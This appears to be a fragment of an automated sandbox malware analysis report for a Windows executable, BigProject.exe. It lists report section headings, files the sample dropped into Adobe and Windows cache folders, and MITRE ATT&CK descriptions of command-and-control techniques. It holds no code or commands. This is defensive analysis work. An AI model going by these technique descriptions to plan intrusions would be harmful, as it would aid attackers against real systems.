Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\3d1e02ca-7d74-4528-a57d-311e10c72d5b.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF3f0879.TMP (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\cc0a8cc8-8a22-4222-80fc-8f4c3b556c85.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Windows Analysis Report
BigProject.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre